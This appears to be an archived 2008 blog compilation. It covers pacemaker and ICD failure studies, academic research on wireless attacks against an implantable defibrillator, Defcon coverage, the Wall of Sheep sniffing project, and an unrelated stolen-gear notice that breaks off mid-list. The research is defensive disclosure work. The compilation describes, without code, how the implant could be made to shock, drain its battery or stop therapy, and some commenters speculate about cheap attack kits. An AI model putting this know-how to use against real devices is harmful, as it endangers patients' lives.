In the first study, which Maisel performed with colleagues at the U.S. Food and Drug Administration (FDA), he found that, between the years of 1990 and 2002, there were 2.25 million pacemakers and almost 416,000 ICDS implanted in the U.S. During this same time period, 17,323 devices (8,834 pacemakers and 8,489 ICDs) were surgically removed from patients due to a confirmed device malfunction. (Battery, capacitor and electrical abnormalities accounted for approximately half of the device failures.) In addition, 61 patient deaths were attributed to pacemaker or ICD malfunction during this 13-year period. “Overall, the annual ICD malfunction replacement rate of 20.7 per 1,000 implants was significantly higher than the pacemaker malfunction replacement rate of 4.6 per 1,000 implants,” notes Maisel. “While pacemakers became increasingly reliable during the study period, a marked increase in the ICD malfunction replacement rate was observed between 1998 and 2002, suggesting that ICDs may have become less reliable during this time period.”

In the second study (conducted by Maisel on non-FDA data), an analysis of international pacemaker and ICD registries involving hundreds of thousands of pacemakers and thousands of ICDs, the overall findings proved very similar to those reported in the analysis of the FDA data. “Specifically, in this second report, pacemaker reliability improved markedly during the study period while the ICD malfunction rate trended down during the first half of the 1990s, reaching its lowest level in the mid-to-late 1990s. And, once again, the ICD malfunction rate increased substantially between the years of 1998 and 2002.” But, he adds, this analysis showed a substantial improvement in ICD reliability in 2003 and 2004, years that were not included in the FDA analysis. “Pacemakers and implantable defibrillators are amazing devices that have saved many lives,” says Maisel. “But like any other complex device, they can and do malfunction. It appears that as ICDs became increasingly sophisticated [in the latter 1990s] there was an associated decrease in device reliability. Fortunately, the most recent defibrillator malfunction rates show a reassuring trend.”

Maisel stresses that patients do not need to take any action as a result of these studies, and that routine pacemaker and defibrillator checks remain the best way to monitor device performance in individual patients. “It’s important to remember that during the time periods we analyzed, there were tens of thousands of lives saved as a result of these devices,” he adds. “The chance of a person’s life being saved by a pacemaker or ICD is about 1,000 times greater than the chance of the device failing when it’s needed.” The analysis of FDA data (first study) was funded by the U.S. Food and Drug Administration, for which Maisel serves as a paid consultant and Chair of the FDA Circulatory System Medical Devices Advisory Panel. Study coauthors included Megan Moynahan, MS, Bram D. Zuckerman, MD, Thomas P. Gross, MD, MPH, Oscar H. Tovar, MD, Donna-Bea Tillman, PhD, MPA, and Daniel B. Schultz, MD, all of the FDA’s Center for Devices and Radiologic Health, Rockville, MD. The analysis of registry data (second study) was conducted independently by Dr. Maisel without FDA financial support.

New data finds defibrillator recalls to be common  /  May 19, 2006

Data presented May 19, 2006 at the Heart Rhythm Society’s 27th Annual Scientific Sessions finds that during a 10-year study period more than one in five automatic external defibrillators (AEDs) were recalled due to potential malfunction. The findings represent some of the first data available on safety and reliability of the devices, which are used to resuscitate victims of cardiac arrest. “AEDs provide automated heart rhythm analysis, voice commands, and shock delivery and can be used by individuals with minimal training or experience,” explains the study’s lead author, William H. Maisel, M.D., M.P.H., director of the Pacemaker and Device Service at Beth Israel Deaconess Medical Center (BIDMC) and assistant professor of medicine at Harvard Medical School. “As a result, widespread installation of AEDs has occurred in recent years.” In fact, he adds, the annual number of the devices distributed between 1996 and 2005 increased almost 10-fold, from fewer than 20,000 to nearly 200,000. “Public places such as airports, sports arenas and casinos are now routinely outfitted with AEDs and the U.S. Food and Drug Administration [FDA] has approved certain AED models for home use,” he says. “Unfortunately, as AED use has increased, so too has the number of recalled devices.” Maisel and his colleagues reviewed weekly FDA enforcement reports to identify recalls and safety alerts (collectively referred to as “advisories”) affecting AEDs. Enforcement reports are issued by the FDA to notify the public about potentially defective medical devices which may not function as intended. During the study period – beginning in 1996 and ending in 2005 – the authors found that the FDA issued 52 advisories involving either AEDs or critical AED accessories, affecting a total of 385,922 devices. “The results showed that during this 10-year study period, more than one in five AEDs were recalled due to a potential malfunction,” says Maisel.

Security researchers to unveil pacemaker, medical implant hacks
by Chris Soghoian  /   March 3, 2008

A team of respected security researchers known for their work hacking RFID radio chips have turned their attention to pacemakers and implantable cardiac defibrillators. The researchers will present their paper, “Pacemakers and Implantable Cardiac Defibrillators: Software Radio Attacks and Zero-Power Defenses,” during the “Attacks” session of the 2008 IEEE Symposium on Security and Privacy, one of the most prestigious conferences for the computer security field. The authors of the paper are listed as: Shane S. Clark, Benessa Defend, Daniel Halperin, Thomas S. Heydt-Benjamin, Will Morgan, Benjamin Ransford, Kevin Fu, Tadayoshi Kohno, William H. Maisel. Kevin Fu, an assistant professor at the University of Massachusetts Amherst, along with two graduate students who worked on the project all gained significant attention for their past work in attacking RFID-based credit cards and RFID (radio frequency identification) transit payment tokens. Kohno, a professor at the University of Washington, was the subject of worldwide media coverage for his work in exposing flaws in Diebold voting machines back in 2003, and then later for finding major privacy flaws in the RFID-based Nike+iPod Sport Kit.

Shocking stuff
When contacted by e-mail, Kohno told me that he and his colleagues could not currently comment on their latest project. Without the help of the authors, it is difficult to predict the contents of their research paper. However, it is possible to piece together other bits of information to try to learn more about the project. A previous research paper published by the same team noted that over 250,000 implantable cardiac defibrillators are installed in patients each year. An increasingly large percentage of these can be remotely controlled and monitored by specialized wireless devices in the patient’s home. The devices can be accessed at ranges of up to 5 meters. By reading between the lines (millions of remotely implanted medical devices, able to administer electrical shocks to the heart, can be controlled remotely from distances up to 5 feet, designed by people who know nothing about security), it is easy to predict the gigantic media storm that this paper will cause when the full details (and a YouTube video of a demo, no doubt) are made public. Just remember where you saw it first.


Q: What are implantable medical devices (IMDs)?
A: Implantable Medical Devices (IMDs) monitor and treat physiological conditions within the body, and can help patients lead normal and healthy lives. There are many different kinds of IMDs, including pacemakers, implantable cardiac defibrillators (ICDs), drug delivery systems, neurostimulators, swallowable camera capsules, and cochlear implants. These devices can help manage a broad range of ailments, including: cardiac arrhythmia; diabetes; chronic pain; Parkinson’s disease; obsessive compulsive disorder; depression; epilepsy; obesity; incontinence; and hearing loss. IMDs pervasiveness continues to swell, with approximately twenty-five million U.S. citizens currently benefiting from therapeutic implants.

Q: What are pacemakers and implantable cardiac defibrillators (ICDs)?
A: Pacemakers and ICDs are both designed to treat abnormal heart conditions. About the size of a pager, each device is connected to the heart via electrodes and continuously monitors the heart rhythm. Pacemakers automatically deliver low energy signals to the heart to cause the heart to beat when the heart rate slows. Modern ICDs include pacemaker functions, but can also deliver high voltage therapy to the heart muscle to shock dangerously fast heart rhythms back to normal. Pacemakers and ICDs have saved innumerable lives, and there are millions of pacemaker and ICD patients in the U.S. today.

Q: Where do you see the technologies for these devices heading in the future?
A: The technologies underlying implantable medical devices are rapidly evolving, and it’s impossible to predict exactly what such devices will be like in 5, 10, or 20 years. It is clear, however, that future devices may rely more heavily on wireless communications capabilities and advanced computation. IMDs may communicate with other devices in their environment, thereby enabling better care through telemedicine and remote patient health monitoring. There may also be multiple, inter-operating devices within a patient’s body. Given the anticipated evolution in IMD technologies, we believe that now is the right and critical time to focus on protecting the security and privacy of future implantable medical devices.

Q: Why is it important to study the security and privacy properties of existing implantable medical devices?
A: Despite recent large advances in IMD technologies, we still have little understanding of how medical device security and privacy interact with and affect medical safety and treatment efficacy. Established methods for providing safety and preventing unintentional accidents do not necessarily prevent intentional failures and other security and privacy problems. Balancing security and privacy with safety and efficacy will, however, become increasingly important as IMD technologies continue to evolve. Prior to our work, we are unaware of any rigorous public scientific investigation into the observable characteristics of a real, common commercial IMD. Such a study is necessary in order to provide a foundation for understanding and addressing the security, privacy, safety, and efficacy goals of future implantable devices. Our research provides such a study. The overall goals of our research were to: (1) assess the security and privacy properties of a real, common commercial IMD; (2) propose solutions to the identified weaknesses; (3) encourage the development of more robust security and privacy features for IMDs; and (4) improve the privacy and safety of IMDs for the millions of patients who enjoy their benefits.

Q: Can you summarize your findings with respect to the security and privacy of a common implantable cardiac defibrillator (ICD)?
A: As part of our research we evaluated the security and privacy properties of a common ICD. We investigate whether a malicious party could create his or her own equipment capable of wirelessly communicating with this ICD. Using our own equipment (an antenna, radio hardware, and a PC), we found that someone could violate the privacy of patient information and medical telemetry. The ICD wirelessly transmits patient information and telemetry without observable encryption. The adversary’s computer could intercept wireless signals from the ICD and learn information including: the patient’s name, the patient’s medical history, the patient’s date of birth, and so on. Using our own equipment (an antenna, radio hardware, and a PC), we found that someone could also turn off or modify therapy settings stored on the ICD. Such a person could render the ICD incapable of responding to dangerous cardiac events. A malicious person could also make the ICD deliver a shock that could induce ventricular fibrillation, a potentially lethal arrhythmia. For all our experiments our antenna, radio hardware, and PC were near the ICD. Our experiments were conducted in a computer laboratory and utilized simulated patient data. We did not experiment with extending the distance between the antenna and the ICD.

Q: Do other implantable medical devices have similar issues?
A: We only studied a single implantable medical device. We currently have no reason to believe that any other implantable devices are any more or less secure or private.

Q: Can you summarize your approaches for defending against the security and privacy issues that you raise?
A: Our previous research (IEEE Pervasive Computing, January-March 2008) highlights a fundamental tension between (1) security and privacy for IMDs and (2) safety and effectiveness. Another goal we tackle in our research is the development of technological mechanisms for providing a balance between these properties. We propose three approaches for providing this balance, and we experiment with prototype implementations of our approaches. Our approaches build on the WISP technology from Intel Research. Some IMDs, like pacemakers and ICDs, have non-replaceable batteries. When the batteries on these IMDs become low, the entire IMDs often need to be replaced. From a safety perspective, it is therefore critical to protect the battery life on these IMDs. Toward balancing security and privacy with safety and effectiveness, all three of our approaches use zero-power: they do not rely on the IMD’s battery but rather harvest power from external radio frequency (RF) signals. Our first zero-power approach utilizes an audible alert to warn patients when an unauthorized party attempts to wirelessly communicate with their IMD. Our second approach shows that it is possible to implement cryptographic (secure) authentication schemes using RF power harvesting. Our third zero-power approach presents a new method for communicating cryptographic keys (“sophisticated passwords”) in a way that humans can physically detect (hear or feel). The latter approach allows the patient to seamlessly detect when a third party tries to communicate with their IMD. We do not claim that our defenses are final designs that IMD manufacturers should immediately incorporate into commercial IMDs. Rather, we believe that our research helps establishes a potential foundation upon which the community can innovate other new defensive mechanisms for future IMD designs.

Q: Where will these results be published?
A: Our results will be published at the IEEE Symposium on Security and Privacy in May 2008. The IEEE is a leading professional association for the advancement of technology. The IEEE Symposium on Security and Privacy is one of the top scholarly conferences in the computer security research community. This year the conference accepted 28 out of 249 submissions (11.2%). All papers were rigorously peer-reviewed by at least three members of the IEEE Security and Privacy committee.

Q: Should patients be concerned?
A: We strongly believe that nothing in our report should deter patients from receiving these devices if recommended by their physician. The implantable cardiac defibrillator is a proven, life-saving technology. We believe that the risk to patients is low and that patients should not be alarmed. We do not know of a single case where an IMD patient has ever been harmed by a malicious security attack. To carry out the attacks we discuss in our paper would require: malicious intent, technical sophistication, and the ability to place electronic equipment close to the patient. Our goal in performing this study is to improve the security, privacy, safety, and effectiveness of future IMDs.

Q: What have you done to ensure that these findings will not be used for malicious intent?
A: We specifically and purposefully omitted methodologic details from our paper, thereby preventing our findings from being used for anything other than improving patient security and privacy.

Cheap, actually
by Kevin McMurtrie / posted 12th March 2008
“Their hacking equipment cost $30000 because of that fancy oscilloscope shown. It wouldn’t surprise me if it cost $29000. The paper states the frequency and encoding protocol. Hackers don’t need the fancy oscilloscope now. Taking into account what a hacker already owns, that cuts the cost down to maybe $50 for a short-range model. Boosting the range to a few city blocks would require maybe another $100 in parts. I bet Cheney goes in for an operation soon.”

RE: Scary Stuff
by Anonymous Coward / posted 12th March 2008
Denial of Life attack : What protection is there against *accidental* re-programming or DoS?
by Keith T / posted 12th March 2008
“Regarding the 30k price tag, it is a radio transceiver and a computer. Medtronic paid $30k for theirs. That doesn’t mean someone could put something together for less. In fact, my main worry would be someone accidentally re-programming or operating the IMD. What protection is there against that? Could it be done by a hacker with a laptop and an standard wireless NIC card? Would the wireless NIC card need to be modified? Could it be done with random noise from a faulty electric motor? And how can we be assured nobody has ever died to their IMD being intentionally re-programmed? If the device was intentionally re-programmed, would the attacker revert the programming back once the victim had died? Would anyone even check the state of the program in the IMD?”

Needs to be close by
by Herby / posted 12th March 2008
“Having done some work for one of these companies (it was a few years ago!) my understanding is that the “controller” (actually a laptop PC) needs to be in close proximity to the “subject”. They usually use “induction”, not radio frequency to couple to the device implanted (at least that is what I saw). Yes, security is not something the device vendors, or the FDA thinks about. Lots of medical devices have “unpatched” windows environments because the vendors haven’t gone thru the process of verification with the latest of windows patches. Most of the time these computers are not connected to a network (they usually don’t need to be!), but sometimes they do get connected, and then the malware arrives with evil intentions. On the ICD I did some work on they used a 65C02 processor, which they needed to get certified outside the normal supply chain (look at any datasheet for ICs and it usually says “not for life critical…”). Then they need to get ALL the software to pass FDA rules (lots of time and $$$). By the time everything is done, the development cost is HUGE. Then they deploy the stuff, and the added cost of a laptop per inplantable device is “small potatoes”, so they just build it into the kit. In my book the big problem is the controlling box (laptop) used to program the implant to do its thing (parameters per subject). As usual, security isn’t a big consideration since most of the development is in an isolated environment. It was interesting how the company “solved” problems in the test environment. It ended up being 4 (yes four) Windows boxes (it was W95) and a logic analyzer to test the ICD which had a 65C02 processor (same as Apple 2). Need something, add more hardware! In order to get the timing for the network between the 4 cpu’s right, they even incorporated a relay to cutoff the network from outside the 4 cpu’s. Oh, well. It was windows, they didn’t even try anything else.
A lot cheaper than 30K
by Anonymous Coward / posted 13th March 2008
“That kit may have cost 30K, but I am betting it can be do for under 1K, probably about $400. Well it is a dog eat dog world, I wouldn’t put is past some young exec to put 1 and 1 together, and see that getting to the top may involve a bit of heartbreak. It use to be the case that the medical world was off limits to hackers, a sort of unwritten agreement, but with governments using the medical world to build the id databases, that has sort of been rescinded. Bit like using the red cross for spying missions, they are now targets because of it. I would imagine that EMP devices would be on the up as well, there I would blame speed cameras, people are taking axle grinders to them, how much easier would it be to just zap them. And of course EMP could be used against a slew of modern security surveillance devices, with the side effect of knocking out the cyborgs with unprotected pace makers.


Defcon: Excuse me while I turn off your pacemaker
by Dean Takahashi  /  August 8th, 2008

The Defcon conference is the wild and woolly version of Black Hat for the unwashed masses of hackers. It always has its share of unusual hacks. The oddest so far is a collaborative academic effort where medical device security researchers have figured out how to turn off someone’s pacemaker via remote control. They previously disclosed the paper at a conference in May. But the larger point of the vulnerability of all wirelessly-controlled medical devices remains a hot topic here at the show in Las Vegas. Let’s not have a collective heart attack, at least not yet. The people on the right side of the security fence are the ones who have figured this out so far. But this has very serious implications for the 2.6 million people who had pacemakers installed from 1990 to 2002 (the stats available from the researchers). It also presents product liability problems for the five companies that make pace makers.

Kevin Fu, an associate professor at the University of Massachusetts at Amherst and director of the Medical Device Security Center, said that his team and researchers at the University of Washington spent two years working on the challenge. Fu presented at Black Hat while Daniel Halperin, a graduate student at the University of Washington, presented today at Defcon. Getting access to a pacemaker wasn’t easy. Fu’s team had to analyze and understand pacemakers for which there was no available documentation. Fu asked the medical device makers, explaining his cause fully, but didn’t get any help. William H. Maisel, a doctor at Beth Israel Deaconess Hospital and Harvard Medical School, granted Fu access for the project. Fu received an old pacemaker as the doctor installed a new one in a patient. The team had to use complicated procedures to take apart the pacemaker and reverse engineer its processes. Halperin said that the devices have a built-in test mechanism which turns out to be a bug that can be exploited by hackers. There is no cryptographic key used to secure the wireless communication between the control device and the pacemaker.

A computer acts as a control mechanism for programming the pacemaker so that it can be set to deal with a patient’s particular defribrillation needs. Pacemakers administer small shocks to the heart to restore a regular heartbeat. The devices have the ability to induce a fatal shock to a heart. Fu and Halperin said they used a cheap $1,000 system to mimic the control mechanism. It included a software radio, GNU radio software, and other electronics. They could use that to eavesdrop on private data such as the identity of the patient, the doctor, the diagnosis, and the pacemaker instructions. They figured out how to control the pacemaker with their device. “You can induce the test mode, drain the device battery, and turn off therapies,” Halperin said.

Translation: you can kill the patient. Fu said that he didn’t try the attack on other brands of pacemakers because he just needed to prove the academic point. Halperin said, “This is something that academics can do now. We have to do something before the ability to mount attacks becomes easier.” The disclosure at Defcon wasn’t particularly detailed, though the paper has all of the information on the hack. The crowd here is mostly male, young, with plenty of shaved heads, tattoos and long hair. The conference is a cash-only event where no pictures are allowed without consent. It draws thousands more people from a much wider net of security researchers and hackers than the more exclusive Black Hat. Similar wireless control mechanisms are used for administering drugs to a patient or other medical devices. Clearly, the medical device companies have to start working on more secure devices. Other hackers have figured out how to induce epileptic seizures in people sensitive to light conditions. The longer I stay at the security conferences here in Las Vegas, the scarier it gets.

Kevin Fu
email : kevinfu [at] cs [dot] umass [dot] edu

Daniel Halperin
email : dhalperi [at] cs [dot] washington [dot] edu

“Our study analyzes the security and privacy properties of an implantable cardioverter defibrillator (ICD). Introduced to the U.S. market in 2003, this model of ICD includes pacemaker technology and is designed to communicate wirelessly with a nearby external programmer in the 175 kHz frequency range. After partially reverse-engineering the ICD’s communications protocol with an oscilloscope and a software radio, we implemented several software radio-based attacks that could compromise patient safety and patient privacy. Motivated by our desire to improve patient safety, and mindful of conventional trade-offs between security and power consumption for resource-constrained devices, we introduce three new zero-power defenses based on RF power harvesting. Two of these defenses are human-centric, bringing patients into the loop with respect to the security and privacy of their implantable medical devices (IMDs). Our contributions provide a scientific baseline for understanding the potential security and privacy risks of current and future IMDs, and introduce human-perceptible and zero-power mitigation techniques that address those risks. To the best of our knowledge, this paper is the first in our community to use general-purpose software radios to analyze and attack previously unknown radio communications protocols.


“Over 9,000 hackers, freaks, feds and geeks are gathered in Las Vegas for Defcon, the world’s largest computer security convention. The temporary wireless network that serves the Defcon attendees is the most hostile on the planet. Defcon’s network is put together and run by a group of dedicated volunteers, known as Goons. These red badge-sporting Network Goons work hard to make the network robust enough to handle the endless stream of dangerous traffic. Threat Level got the first ever photo tour of the Defcon Network Operations Center. Here are the photos for your viewing pleasure.”

Defcon ends with researchers muzzled, viruses written
by Elinor Mills  /  August 10, 2008

The Defcon hacker conference ended its 16th year on Sunday, sending about 8,000 attendees home from a weekend of virus writing, discussion of Internet attacks, and general debauchery. The highlight was most definitely the restraining order which prevented three MIT students from presenting their research on how to hack the Boston subway system. The students attended the event and even gave a news conference after the order came down on Saturday, but did not present their highly anticipated talk. Instead, journalist and security expert Brenno de Winter took their empty spot and discussed how the cards used in transit system in The Netherlands and London can be hacked just like the ones used in Boston. Both systems, and many around the world, use the Mifare Classic chip technology, whose cryptography was cracked by researchers last year. “I was advised by several lawyers not to go into details of the Mifare Classic, but anybody who has access to Google…,” de Winter said. Breaking the rules is always a theme at Defcon, but while irreverence for established corporate and government protocols is condoned if not exactly encouraged, breaking Defcon rules definitely has its consequences. Defcon officials said they were considering banning film crews from future events after ejecting a team from the G4 cable network on Saturday for allegedly videotaping a crowd. Photographers and videographers are required to get permission to shoot anyone, even from behind, and are forbidden from shooting crowds.

There was a report that police were called in to investigate a Windows-based kiosk that was hacked to display pornographic images in the lobby. And the usual rowdiness and late-night drinking were a nightly, if not daily, activity. However, things did not seem to reach the level of tomfoolery they did in in the early and mid-1990s when elevators were hacked and cement was poured down toilets. Of course, many of the script kiddies from that era are now married with children. There were, of course, a range of sessions, including ones on evaluating the risks of “good viruses,” hijacking outdoor billboard networks, and compromising Windows-based Internet kiosks. Members of SecureState, a company that does penetration testing of corporate networks, gave a live demo in one session of an automated attack on Microsoft SQL Server-based computer that left the machine vulnerable to attackers installing viruses and other malware. The team used new tools they are offering for download, SA Exploiter and Fast-Track.

One of the more controversial events at the event was a “Race to Zero,” in which teams modified samples of viruses and tested them against antivirus software. Four teams managed to complete all the levels and get through the antivirus software. There were less technical contests as well. “Mike” from Chicago won $3,000 for spending 30 straight hours listening to pitches and marketing buzz from security company Configuresoft and correctly answering questions on periodic quizzes on the presentations. After the announcement, he jumped out of his seat with his arms in the air. Asked how he felt, Mike, who declined to give a last name, said he “felt smelly.” The contest, called “Buzzword Survivor,” was not without scandal. Several contestants claimed–and submitted a cell phone photo as evidence to organizers–that one of the contestants had fallen asleep at one point. However, he was allowed to remain in the contest and made it to the very end with all the others, winning $200. The second prize was $1,000.  Gartner analyst Paul Proctor came up with the idea on a whim. It was originally intended to have 10 contestants competing for 36 hours for a $10,000 prize, but the prize was reduced when only one sponsor stepped up. The contestants had 10 minute breaks every hour, but otherwise were in their seats listening to detailed talks about the company, its products, and the industry. “We’ve submitted them to pain,” Andrew Bird, a Configuresoft vice president, who served as MC at the end of contest, said mischievously. “We played recorded Webinars at 4 a.m.”

Defcon founder Jeff Moss aka “Dark Tangent” discusses ethics of hacking + disclosure issues that provoke debate, often lawsuits, at the event


One of the more popular gadgets from the previous two Defcons were the hackable convention badges. This year, we convinced Defcon’s founder Jeff Moss, aka Dark Tangent, and badge-designer Joe “Kingpin” Grand, to give an exclusive sneak preview of the Defcon 16 badge. Keep in mind that the badge in the photo is a prototype; the actual badges will be a different color, won’t have the USB and debug ports soldered on, nor include an SD card (so bring one, seriously).

Threat Level: Defcon 15’s badge was exponentially more complicated and functional than Defcon 14’s badge. How does this year’s badge compare to the DC 15 badge?
Joe Grand: Last year’s badge was sort of an over-engineered project. We wanted to do something that was cool and different than the year before, but it ended up getting more complicated because of design problems along the way … I was really aiming to have something a little less complicated and a little less over-engineered than Defcon 15, but still more complicated then Defcon 14 and have enough hackable features to make it interesting enough for people. It’s more simple than last year but also more powerful.

TL: Why did you choose a Freescale microprocessor, and why did you choose the MC9S08JM60 over the MC9S08QG8?
JG: The guys at Freescale have been super supportive throughout both the Defcon 15 and this Defcon 16 badge. One of their things is that they have a lot of engineers who truly love engineering and they love coming up with new products that use their technologies. They understand that it is a hacker gathering and the hackers are ultimately the ones who are creating the cutting-edge products and they’re messing around with technology and doing things that haven’t been done before. They love the concept and they love being involved with Defcon … The JM60 was a new product that they just launched … We looked at the processor and said the JM60 has support for USB so let’s use USB. It has support for a Secure Digital card so let’s add SD in there … I rarely come across companies that are as passionate as I am about a project and these guys are, so it’s a total thrill to be able to work with them.

TL: What components and other fun stuff does the badge have?
JG: The artistic elements and the PC board design tricks that I did this year [are] some of my favorite parts of doing the badge. Ping and Dark Tangent don’t necessarily understand the engineering constraints of making circuit boards so they really push me … In turn I get to learn a lot of new techniques … We’re doing stuff that’s totally crazy and nonstandard for circuit boards.

TL: Are they the same batteries as last year?
JG: No, different batteries. One of the things I ran into last year that I was pretty embarrassed about was the battery life. Depending on how much you used the badge, the batteries didn’t even last the weekend. For me one of my major design goals is making sure that the badge lasted longer than Defcon. This year I went with a larger battery,  something that’s way more robust and will just last a long time for people who really want to hack on the badge. It’s one of the CR123A batteries. These things will last a long time, weeks if not months. It’s a little bigger than I would have like, but I placed it in away that hopefully will not get too annoying for people.

TL: Did you see the RFID badges at The Last HOPE?  Will yours also include some kind of unique ID for buddy/hacker tracking?
JG: I didn’t [see the HOPE badges] … We talked about the badges being able to either track each other or have some kind of unique identifier, but I think that shit is just way too big brother. Most people at Defcon don’t even use their real name. Forcing them to wear a badge that has features like that, to me is crap. I wouldn’t want to wear one of them.

TL: What were the biggest challenges in the badge development this time around?
JG: This badge … ended up taking 200 hours to design, versus the 170 from last year … Most of that was because I was trying new things I’d never done before … During the process every time I had an engineering problem or I stayed up late … I just kept thinking the pain’s going to be worth it. Once the badge is done and it gets into people’s hands and they just love the way it looks and they have fun with it and they hack on it it makes all of the trouble worthwhile to get people interested into this type of thing.

TL: How are you going to top this badge next year?
JG: I have a few ideas for what I want to do next year assuming we do it … I won’t say what they are yet, but it’s going to be cool.

TL: What other projects are you working on right now?
JG: I just started a new apparel line called Kingpin Empire … I am going to donate a portion of the proceeds to hacker related charities and health related charities: EFF, ACLU, American Heart Association. Things that have personally affected me or personally saved me in some way. It’s a way for me to spread the hacker message to the masses … to educate people as to what hacking is about, support hacker and health related causes and give back to the community that shaped my entire life.

TL: Anything else you want to say about the badge?
JG: I just hope people like it. It’s a labor of love. The more people that hack on it the better. I want people to modify it, I want people to fix any problems they might see with it and just make it their own. If I can inspire just one person out of the 8,500 people that have a badge to start hacking on things and maybe even become and engineering then I’ve done my part.

Displays Detail Who Has Sent Readable Data Using Insecure Wireless Connections
by Robert McMillan  /  August 11, 2008

The Wall of Sheep has become a fixture of the Defcon hacker conference: a wall with a long list of details showing who at the conference has sent readable data using insecure wireless connections. For Brian Markus, better known to conference attendees as “Riverside,” it just may become a line of business. Last month, Markus and three of his fellow volunteers incorporated a company called Aries Security, which they bill as an education and security awareness consultancy that can come in and identify risky behavior on corporate networks.  The company is still in an experimental state, meaning that none of the partners have actually quit their day jobs, Markus said. They don’t expect companies to start projecting their own Wall of Sheep displays in their lobbies, but they say the network analysis tools they’ve developed could be helpful when aimed at corporate networks. “We can go into a company if they need help with a security awareness program,” Markus said. “There are an amazing amount of things that we could see by watching the traffic go by.” Wall of Sheep got its start in 2002, when Markus and friends were sniffing wireless LAN traffic at Defcon. It turned out there were plenty of people putting their data out on those networks. “We were saying there are so many of them, they are everywhere.” Inspired by a T-shirt, they decided to call the people they could observe “sheep,” and they started sticking paper plates on the wall with some of the user details they’d found. They list login names, domain or Internet Protocol addresses and partial passwords. Hotel management wasn’t crazy about the idea of paper plates being stuck to the walls, so the Wall of Sheep was soon using a projector.

They’ve seen some pretty crazy stuff revealed on open wireless LANs over the years, including fake usernames and passwords, brand-new computer attacks, a tax return and what Markus calls “nontypical adult material.” Today the project attracts dozens of volunteers at the conference who spend hours hunched over computers analyzing data before it’s put up on the wall. “It’s a tremendous amount of human labor,” Markus said. Wall of Sheep made its first appearance ever at Defcon’s less chaotic sister conference Black Hat this year, and it got a lot of attention when French journalists tried to post sensitive information on the wall that was culled from a Black Hat network set up for reporters. Because the journalists had illegally sniffed the Black Hat network without permission, Markus refused, and eventually the journalists were ejected from the conference. “We said, ‘No way,'” he said. “It’s completely against what all of us are trying to do.”

About the Wall of Sheep

Our mission is to raise security awareness. Computer crime and identity theft loom large in most people’s unconscious fears because they do not know:
1. How they are at risk, and
2. The steps they can take to protect themselves.

We explain both, but the way we do it is unconventional . . .

What We Do
The Wall of Sheep is an interactive demonstration of what can happen when network users let their guard down. We passively observe the traffic on a network, looking for evidence of users logging into email, web sites, or other network services without the protection of encryption. Those we find get put on the Wall of Sheep as a good-natured reminder that a malicious person could do the same thing we did . . . with far less friendly consequences. More importantly, we strive to educate the “sheep” we catch—and anyone who wants to learn— how to use free, easy-to-use tools to prevent leaks in the future.

Some Background
Nearly every time a network is accessed, an email account is checked, a web application is logged into, or a message is sent, some form of identification is passed between systems. By simply listening to this network traffic and sorting out the interesting bits, ill-intentioned third parties can often steal a password or other credentials with little to no effort. In reality, on average, the occurrence of such eavesdroppers is infrequent, but that does not diminish the consequences if they are listening. Why risk a chance when you don’t have to? Awareness and education is the key. The tools and knowledge to protect yourself are freely available. Most of the time, they are built into your current system.

Our Approach
The Wall of Sheep shows what happens when there are eavesdroppers on your network. If you access a network we are listening to without protecting yourself, we will see your username and password. Then we will post identifying elements* of your transaction on the the Wall in front of all of your friends and colleagues. At that point, we hope you will come to us and learn how to avoid such mistakes in the future.

The Bottom Line
A potential attacker might maliciously and criminally use your mistakes against you. We do the opposite by raising security awareness and providing education on how to be defensive. It is very easy to become a “sheep,” but it is just as easy to learn how to avoid turning into one.

*but never the whole thing

From the archive, originally posted by: [ spectre ]





Aug 4, 2008 3:27 PM

if anyone has information, ANY INFORMATION!
please, please, PLEASE as soon as possible contact
Eric Fischer at:
cell phone: +1 646 932 1907


all equipment was in a rented penske 15 foot yellow truck
with u.s. (michigan) license plate number AC46493
parked immediately outside the hotel, the theft had
to have happened in the morning, between 6:30 and
7:30 am – truck and all gear stolen

pictures of some of the stolen stuff

Item      Country of Origin   Serial Number

Red roadcase containing:
Red Gibson 1963 EB-3 bass (this is mike watt’s bass!)   USA   No
serial number

Black roadcase containing:
Reverend Flying V guitar – Volcano black   USA   #08001

Black roadcase containing:
Reverend Orange guitar   USA   03416 ZSL7

Black fibre case containg:
Gibson red SG short scale bass   USA   No serial number

Black roadcase containing:
Marshall Vintage/Modern Amplifier   UK   M-2007-07-0926-2 RoHS

Black roadcase containing:
Marshall Vintage/Modern Amplifier   UK   M-2007-07-0927-2 RoHS

4x Marshall 4×12 Cabinets (with Tuki cover)      UK   #1 Slant:  M-2007-05-0149-0

4x Marshall 4×12 Cabinets (with Tuki cover)      UK   #2 Straight:  M-2006-49-0380-0

4x Marshall 4×12 Cabinets (with Tuki cover)      UK   #3 Slant:  M-2007-05-0150-0

4x Marshall 4×12 Cabinets (with Tuki cover)      UK   #4 Straight:  M-2006-49-0381-0

Orange Calzone road case containing:
Guitar pedal board and pedals   USA/Japan   No serial number
Assorted leads    USA/UK   No serial number
2x mic stands   Germany   No serial number
Assorted strings and spares   USA   No serial number
2x Boss TU2 Chromatic Tuner
Boss CH1 Super Chorus
Fulltone OCD Overdrive
Crybaby Wah
Peterson Strobo-Stomp Tuner Pedal
Whirlwind A/B Boxes
Whirlwind Cable Tester
and many many istrument cables
various tools ( screwdrivers, soldering iron, pliers, etc… )
tambourine and maracas

Cardboard box containing:
Assorted replacement drum heads   USA   No serial number

Gretsch Silver Sparkle Catalina drum kit      USA   No serial number
26″ Kick Drum      No serial number
13″ Rack Tom      No serial number
18″ Floor Tom      No serial number
4x Cymbal Stands      No serial number
1x Snare Stand      No serial number
1x Hi Hat Stand      No serial number
1x Drum Throne      No serial number

Eden D810 Bass cabinet      USA   D810RP4 0703E5001

Eden D810 Bass cabinet      USA   D810RP4 0703E5002

Cardboard box containg:
Eden VT300 Bass amplifier   USA   0601E5115

Cardboard box containg:
Eden VT300 Bass amplifier   USA   0507E5033

Floor Fan      CHINA   No serial number

Floor Fan      CHINA   No serial number

Green clamshell suitcase containing:
Yamaha snare drum   JAPAN   No serial number
Yahama kick pedal   JAPAN   No serial number
Zildjian Mega Bell cymbal   USA   No serial number
Zildjian 15″ Hi-Hats   USA   No serial number
3x Zildjian 18″ 19″ 20″ crash medium cymbals   USA   No serial number

Brown Epiphone guitar case:
Black Epiphone EB3 short scale bass   KOREA   F300503

1 x Wheeled Black Pelican case (50cm x 28cm x 20cm) containing :
A selection of microphones and microphone accessories, most of which
are in separately labeled black pouches. All of the microphones are of
Shure manufacture, also a BSS DI box. Inside the Pelican case there is
also a Ferrari pencil case containing an iPod, iPod accessories,
various small cables and adaptors, a Leatherman Charge, a Stooges AAA
